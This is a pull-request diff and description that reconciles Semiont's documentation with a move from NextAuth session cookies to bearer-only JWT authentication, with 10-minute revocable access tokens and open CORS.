@@ -30,8 +30,6 @@ docker pull ghcr.io/the-ai-alliance/semiont-frontend:dev
 
 **Required environment variables:**
 - `SERVER_API_URL` — Backend API URL
-- `NEXTAUTH_URL` — Frontend URL for NextAuth callbacks
-- `NEXTAUTH_SECRET` — Secret for NextAuth session encryption (min 32 characters)
 
 **Optional environment variables:**
 - `NEXT_PUBLIC_SITE_NAME` — Site name displayed in UI (default: `Semiont`)

--- a/docs/system/administration/SECURITY.md
+++ b/docs/system/administration/SECURITY.md
@@ -8,13 +8,12 @@ This document describes the current security implementation in Semiont and provi
 
 For backend implementation details, see the [Backend Authentication Guide](../../../apps/backend/docs/AUTHENTICATION.md).
 
-Semiont implements authentication using NextAuth.js with support for:
+Semiont implements **bearer-only** authentication — an `Authorization: Bearer` JWT on every request, no session cookies (see [Authentication](./AUTHENTICATION.md)) — with OAuth sign-in support for:
 
 - **Google OAuth**: Secure authentication via Google Identity Platform (production environments)
 - **GitHub OAuth**: Secure authentication via GitHub (production environments)
 - **GitLab OAuth**: Secure authentication via GitLab (production environments)
-- **Session Management**: JWT-based session handling with configurable expiration
-- **Backend JWT Tokens**: 7-day access tokens, 30-day refresh tokens for MCP clients
+- **Bearer JWTs**: 10-minute access tokens, 30-day refresh tokens, with a per-user `tokenVersion` revocation epoch (logout revokes all of a user's tokens)
 
 ### Authorization
 
@@ -83,8 +82,6 @@ Comprehensive security test coverage ensures no authentication regressions:
 
 ```bash
 # Required environment variables (keep secure)
-export NEXTAUTH_SECRET="<strong-random-string>"
-export NEXTAUTH_URL="https://your-domain.com"
 export JWT_SECRET="<strong-random-string-32-chars-minimum>"
 export GOOGLE_CLIENT_ID="<oauth-client-id>"
 export GOOGLE_CLIENT_SECRET="<oauth-client-secret>"
@@ -113,8 +110,8 @@ export OAUTH_ALLOWED_DOMAINS="example.com,example.org"
 | HTTPS | Optional | Required |
 | Error Details | Full stack traces | Generic error messages |
 | Debug Logging | Enabled | Disabled |
-| CORS | Permissive | Restrictive (frontend domain only) |
-| JWT Expiration | 7 days | 7 days (access), 30 days (refresh) |
+| CORS | Open (`*`, bearer-only) | Open (`*`, bearer-only) |
+| JWT Expiration | 10 min (access), 30 days (refresh) | 10 min (access), 30 days (refresh) |
 
 ## Security Best Practices for Operators
 
@@ -122,7 +119,7 @@ export OAUTH_ALLOWED_DOMAINS="example.com,example.org"
 
 1. **OAuth Configuration**: Configure OAuth providers with appropriate redirect URIs
 2. **Domain Restrictions**: Set OAUTH_ALLOWED_DOMAINS to restrict user registration by email domain
-3. **Session Timeout**: Configure appropriate session expiration times (default: 24 hours NextAuth, 7 days backend JWT)
+3. **Token Expiration**: Access tokens are short-lived (10 min); refresh tokens last 30 days; a logout revokes all of a user's tokens (see [Authentication](./AUTHENTICATION.md))
 4. **API Keys**: Rotate API keys and secrets regularly
 5. **Admin Accounts**: Limit admin role assignments to trusted users
 
@@ -147,7 +144,7 @@ full request trace, and the `bus.dispatch:*` server spans on
 2. **File Permissions**: Ensure proper file system permissions on `SEMIONT_ROOT`
 3. **Database Security**: Follow database-specific security guidelines
 4. **Audit Trails**: Retain logs for security analysis (all events include userId)
-5. **Secret Rotation**: Regularly rotate JWT_SECRET, NEXTAUTH_SECRET, and OAuth credentials
+5. **Secret Rotation**: Regularly rotate JWT_SECRET and OAuth credentials
 
 ### Supply-Chain Integrity
 

--- a/docs/system/administration/TROUBLESHOOTING.md
+++ b/docs/system/administration/TROUBLESHOOTING.md
@@ -517,11 +517,11 @@ semiont exec --service backend 'touch /mnt/efs/test.txt && echo "test" > /mnt/ef
 # Check OAuth configuration
 semiont configure show
 
-# Check OAuth environment variables
-semiont exec --service frontend 'env | grep -E "(GOOGLE|NEXTAUTH|OAUTH)"'
+# Check OAuth environment variables (the backend exchanges the Google credential and mints JWTs)
+semiont exec --service backend 'env | grep -E "(GOOGLE|OAUTH|JWT_SECRET)"'
 
-# Check NextAuth logs
-semiont watch logs --service frontend | grep -i "nextauth\|oauth\|google"
+# Check backend auth logs
+semiont watch logs --service backend | grep -i "oauth\|google\|auth"
 ```
 
 **Common Causes & Solutions:**
@@ -529,7 +529,7 @@ semiont watch logs --service frontend | grep -i "nextauth\|oauth\|google"
 - **Invalid OAuth credentials:** Verify Google Client ID and Secret are correct
 - **Wrong redirect URI:** Ensure redirect URI in Google Console matches your domain
 - **Domain restrictions:** Check OAuth domain configuration in `/environments/[env].json`
-- **Session secret missing:** Verify NEXTAUTH_SECRET is set
+- **JWT secret missing:** Verify `JWT_SECRET` is set on the backend
 - **HTTPS requirement:** OAuth requires HTTPS in production
 
 ### 8. Cost Budget Exceeded

--- a/docs/system/platforms/AWS.md
+++ b/docs/system/platforms/AWS.md
@@ -204,8 +204,8 @@ ListenerCondition.pathPatterns(['/api', '/api/*'])
 ```
 
 **Benefits**:
-- **No path conflicts**: NextAuth at `/auth/*` doesn't intercept backend `/api/auth/*` routes
-- **Clear separation**: Frontend handles OAuth, backend handles all API logic
+- **No path conflicts**: the SPA's client-side routes don't intercept backend `/api/*` routes
+- **Clear separation**: the frontend is a static SPA; the backend handles all API logic (including the OAuth credential exchange + JWT minting)
 - **Simple mental model**: Easy to understand routing rules
 - **Independent scaling**: Frontend and backend scale separately
 

--- a/docs/system/services/OVERVIEW.md
+++ b/docs/system/services/OVERVIEW.md
@@ -63,7 +63,6 @@ Services are configured per environment in `~/.semiontconfig`:
 [environments.local.backend]
 port = 4000
 publicURL = "http://localhost:4000"
-corsOrigin = "http://localhost:3000"
 
 [environments.local.make-meaning.graph]
 type = "memory"   # or: neo4j

--- a/docs/system/services/SECRETS.md
+++ b/docs/system/services/SECRETS.md
@@ -10,7 +10,7 @@ Semiont stores secrets in a dedicated file outside the project directory, separa
 
 ```toml
 [secrets]
-JWT_SECRET = "..."   # Shared with frontend as NEXTAUTH_SECRET
+JWT_SECRET = "..."   # Backend-only: signs and validates bearer JWTs
 ```
 
 This file is:
@@ -21,7 +21,7 @@ This file is:
 
 ## JWT Secret
 
-The JWT secret must be identical in both the backend (`JWT_SECRET`) and frontend (`NEXTAUTH_SECRET`). Storing it in the secrets file ensures it persists across re-provisions without ever appearing in a config file that might be synced or accidentally committed.
+The JWT secret is used by the **backend** to sign and validate bearer tokens. The frontend is a pure SPA and never sees it — it only holds the bearer token the backend returns. Storing the secret in the secrets file ensures it persists across re-provisions without ever appearing in a config file that might be synced or accidentally committed.
 
 ### First provision
 ```

--- a/packages/http-transport/docs/MEDIA-TOKENS.md
+++ b/packages/http-transport/docs/MEDIA-TOKENS.md
@@ -17,7 +17,7 @@ A media token is a short-lived JWT with:
 
 Signed with the same `JWT_SECRET` as session tokens. No backend state — validation is pure crypto.
 
-The token is appended as a query parameter: `?token=<media-token>`. The backend validates it on resource endpoints and accepts it in place of a session cookie or Bearer token.
+The token is appended as a query parameter: `?token=<media-token>`. The backend validates it on resource endpoints and accepts it in place of a Bearer token (for elements that can't send a header).
 
 ### Threat model
 
@@ -54,7 +54,7 @@ const { token, loading } = useMediaToken(resourceId);
 ```
 ResourceViewerPage
   → useMediaToken(resourceId)
-      → POST /api/tokens/media  (Bearer/cookie auth, once per 4 min)
+      → POST /api/tokens/media  (Bearer auth, once per 4 min)
       → { token }
   → resourceUrl = `${baseUrl}/api/resources/${id}?token=${token}`
   → passes resourceUrl to viewer component

--- a/packages/react-ui/docs/ARCHITECTURE.md
+++ b/packages/react-ui/docs/ARCHITECTURE.md
@@ -634,10 +634,11 @@ client.browse.resources({});
 
 ### Authentication
 
-- Never store tokens in localStorage (XSS risk)
-- Use httpOnly cookies when possible
-- Validate tokens on every API call
-- Handle 401/403 responses globally
+- **Bearer-only:** the access token is sent as `Authorization: Bearer <jwt>` — no cookie, no ambient credential
+- Access tokens are **short-lived (10 min)** and **revocable**: logout bumps the user's `tokenVersion`, invalidating the refresh token and every live access token server-side, on all devices
+- The access + refresh tokens are held in memory and persisted per-KB through the `SessionStorage` adapter; the short TTL plus server-side revocation are the XSS mitigation (the token lives in app-controlled storage, not a browser-managed credential)
+- Handle 401/403 globally — the active session's `SessionSignals` surface `SessionExpiredModal` / `PermissionDeniedModal`
+- See the canonical [AUTHENTICATION.md](../../../docs/system/administration/AUTHENTICATION.md) for the full model
 
 ### Input Validation
 

--- a/packages/react-ui/docs/SESSION.md
+++ b/packages/react-ui/docs/SESSION.md
@@ -82,7 +82,7 @@ App-level singleton. Owns:
   sit on the spinner forever after every `signOut`, which
   intentionally leaves `activeKbId` set with `session` null.
 - `openResources$` — open-resource list (tab bar)
-- `identityToken$` — app-level identity bridge (e.g. NextAuth)
+- `identityToken$` — optional app-level identity bridge: a slot the host populates (via `setIdentityToken()`) with an external OAuth identity token, for environments that bridge one in
 - `error$` — session-level error stream
 - CRUD methods: `addKb`, `removeKb`, `setActiveKb`, `signIn`, `signOut`,
   `addOpenResource`, etc.

--- a/packages/sdk/src/session/semiont-browser.ts
+++ b/packages/sdk/src/session/semiont-browser.ts
@@ -183,11 +183,11 @@ export class SemiontBrowser {
     return this.eventBus.get(channel).asObservable();
   }
 
-  // ── Identity token (NextAuth bridge; D1) ──────────────────────────────
+  // ── Identity token (external OAuth/identity bridge; D1) ───────────────
 
   /**
-   * Set the app-level identity token. Sourced from whatever the host
-   * environment uses for OAuth sessions (e.g. NextAuth in a browser app).
+   * Set the app-level identity token. Sourced from an external
+   * OAuth/identity-provider token supplied by the host environment.
    * Should be called once from the host's startup-and-on-change site;
    * no other code should write to this slot.
    */

--- a/tests/e2e/README.md
+++ b/tests/e2e/README.md
@@ -26,67 +26,45 @@ container run --rm \
 ```
 
 > If every test fails in the `signIn` fixture with *"Request failed due
-> to a network error"*, it's a CORS-origin mismatch — see
-> [Signing in: CORS origin](#signing-in-cors-origin-the-host-gateway-workaround).
+> to a network error"*, the Playwright container can't reach the
+> host-published backend — see [Container networking](#container-networking-reaching-the-host).
 
-## Signing in: CORS origin (the host-gateway workaround)
+## Container networking: reaching the host
 
-The browser the suite drives makes a *credentialed* auth POST to the
-backend (`POST /api/tokens/password`). The backend allows exactly **one**
-CORS origin — `services.backend.corsOrigin`, a single string baked into
-the backend image at build time. If the page's origin (`E2E_FRONTEND_URL`)
-isn't that exact origin, the browser blocks the response and **every test
-fails in the `signIn` fixture** with:
+The suite runs in a Playwright **container**, but the frontend and backend
+are published on the **host**. A containerized browser **can't use
+`localhost`** — inside the container that resolves to the container itself,
+not the host. And pinning a container's bridge IP is fragile: container IPs
+change on every restart.
 
+The robust target is the **host bridge gateway**, `192.168.64.1`: it's
+reachable from inside containers, routes to the host's *published* ports
+(`:3000`→frontend, `:4000`→backend), and its address is **stable across
+restarts**.
+
+> **No CORS origin to configure.** The backend serves open CORS
+> (`Access-Control-Allow-Origin: *`, bearer-only — no credentials), so the
+> browser signs in from *any* origin. This removed an earlier
+> `corsOrigin`-baked-into-the-image workaround; if you're following older
+> notes that tell you to set `services.backend.corsOrigin` and rebuild,
+> that config field no longer exists.
+
+Run the suite against the gateway for **both** URLs, with the frontend
+published on host port 3000 (`-p 3000:3000`; the backend already publishes
+`4000`). No IP-grabbing needed — the gateway doesn't change between runs:
+
+```sh
+container run --rm \
+  -v "$(git rev-parse --show-toplevel):/workspace" \
+  -w /workspace/tests/e2e \
+  -e E2E_EMAIL=admin@example.com \
+  -e E2E_PASSWORD=password \
+  -e E2E_FRONTEND_URL=http://192.168.64.1:3000 \
+  -e E2E_BACKEND_URL=http://192.168.64.1:4000 \
+  -e CI=1 \
+  mcr.microsoft.com/playwright:v1.60.0-noble \
+  npx playwright test
 ```
-Request failed due to a network error: POST http://…:4000/api/tokens/password
-```
-
-`curl` to the same endpoint *succeeds* — curl doesn't enforce CORS, only
-the browser does. So a green `curl` is not proof the browser can sign in.
-
-The KB template defaults `corsOrigin` to `http://localhost:3000`, but a
-containerized Playwright browser **can't use `localhost`** — inside the
-container that resolves to the container itself, not the frontend. And
-pinning the frontend's bridge IP is fragile: container IPs change on every
-restart. The robust target is the **host bridge gateway**, `192.168.64.1`:
-it's reachable from inside containers, routes to the host's *published*
-ports (`:3000`→frontend, `:4000`→backend), and its address is **stable
-across restarts**.
-
-**Workaround — two parts:**
-
-1. In the KB's active semiontconfig (e.g.
-   `.semiont/containers/semiontconfig/anthropic.toml`), set the gateway
-   origin:
-
-   ```toml
-   [environments.local.backend]
-   corsOrigin = "http://192.168.64.1:3000"
-   ```
-
-   Then **rebuild** the backend image. `corsOrigin` is `COPY`-baked into
-   the image (`Dockerfile.backend`), so a plain restart won't pick up the
-   change — `start.sh` rebuilds on every run; use `--no-cache` to be sure.
-   (This is a local, machine-specific edit — don't commit it to the KB.)
-
-2. Run the suite against the gateway for **both** URLs, with the frontend
-   published on host port 3000 (`-p 3000:3000`; the backend already
-   publishes `4000`). No IP-grabbing needed — the gateway doesn't change
-   between runs:
-
-   ```sh
-   container run --rm \
-     -v "$(git rev-parse --show-toplevel):/workspace" \
-     -w /workspace/tests/e2e \
-     -e E2E_EMAIL=admin@example.com \
-     -e E2E_PASSWORD=password \
-     -e E2E_FRONTEND_URL=http://192.168.64.1:3000 \
-     -e E2E_BACKEND_URL=http://192.168.64.1:4000 \
-     -e CI=1 \
-     mcr.microsoft.com/playwright:v1.60.0-noble \
-     npx playwright test
-   ```
 
 ## Docs
 


### PR DESCRIPTION
## Summary

Doc-side companion to #890 (bearer-only auth + revocable sessions + open CORS). Reconciles the documentation across the monorepo to the merged auth model, and sweeps the older NextAuth / Next.js→Vite-SPA staleness entangled in the same files. Tracked as the `AUTH-DOCS` plan; this PR lands **phases 1–6 and 8** (phase 7, `packages/mcp-server`, is still open).

**The model these docs now describe:** bearer-only (`Authorization: Bearer`, no session cookies) · 10-minute access JWT carrying a per-user `tokenVersion` revocation epoch · 30-day refresh via the SDK Session · logout = `204`, revoke-all-devices · `?token=` media tokens for `/api/resources/:id` · open CORS (`*`, no credentials) · pure Vite + React SPA (no NextAuth) · MCP token routes deleted.

## What landed, by area

- **`docs/` (system + protocol)** — rewrote `system/administration/AUTHENTICATION.md` to the bearer-only + revocable-session model; CORS posture + TTLs in `SECURITY.md`; removed dead `corsOrigin` from `CONFIGURATION.md` / `services/OVERVIEW.md`; dropped the deleted `generateMcpToken` from `protocol/TRANSPORT-CONTRACT.md`; TTL fix in `protocol/RBAC.md`; NextAuth-removal cleanup in `IMAGES.md` / `TROUBLESHOOTING.md` / `platforms/AWS.md` / `services/SECRETS.md`.
- **`tests/e2e/README.md`** — replaced the obsolete `corsOrigin` "host-gateway workaround" (open CORS made it moot) with a "Container networking" section, keeping the container→host gateway-IP guidance.
- **`apps/backend`** — `README.md` + `docs/AUTHENTICATION.md`: bearer-only; dropped the NextAuth + MCP-token-route sections. Comment-only fix in `src/routes/auth.ts` (access-token TTL comments `1h` → `10m`).
- **`apps/frontend`** (largest) — **deleted `RESOURCE-PROXY.md`** (the NextAuth-session-cookie proxy) and added **`MEDIA-ACCESS.md`** documenting the `?token=` media-token model; rewrote `ARCHITECTURE.md` / `API-INTEGRATION.md` / `COMPONENT-LIBRARY.md` to `SemiontClient` + the `SemiontProvider` / `useSemiont()` model; de-NextAuth'd `TESTING.md` / `DEVELOPMENT.md` / `AUTHORIZATION.md`; minor touch-ups in `AUTHENTICATION.md` / `FUTURE.md` / `PERFORMANCE.md` / `ARCHIVE-CLONE.md`.
- **`apps/cli`** — removed deleted `corsOrigin` from `docs/ARCHITECTURE.md` + `docs/ADDING_ENVIRONMENTS.md` config examples.
- **`packages/react-ui`** — `docs/ARCHITECTURE.md` (dropped httpOnly-cookie advice) + `docs/SESSION.md` (NextAuth identity example).
- **`packages/http-transport`** — `docs/MEDIA-TOKENS.md`: the media token is used in place of a Bearer header, not a session cookie.
- **`packages/sdk`** — comment-only fix in `src/session/semiont-browser.ts` (identity-token JSDoc: "NextAuth bridge" → generic external OAuth/identity bridge).

## Notes

- **Docs-only**, except two **comment-only** source corrections (`apps/backend/src/routes/auth.ts`, `packages/sdk/src/session/semiont-browser.ts`) — no logic change, so the security/testing checklist is N/A.
- **Not included:** phase 7 (`packages/mcp-server` README — the 10m TTL + the static-token-doesn't-refresh gap); the MCP provisioning rebuild is tracked separately (`MCP-AUTH`).
- **Deviation from the plan:** `apps/frontend` replaced `RESOURCE-PROXY.md` with a new `MEDIA-ACCESS.md` rather than rewriting it in place.

## Type of Change

- [x] Documentation update

## Areas Changed

- [x] Frontend (`apps/frontend`)
- [x] Backend (`apps/backend`) — comment only
- [x] CLI (`apps/cli`)
- [x] HTTP Transport (`packages/http-transport`)
- [x] Documentation (`docs/`)

_Also: `packages/react-ui` (docs) and `packages/sdk` (one comment) — not listed in the template's area checkboxes._
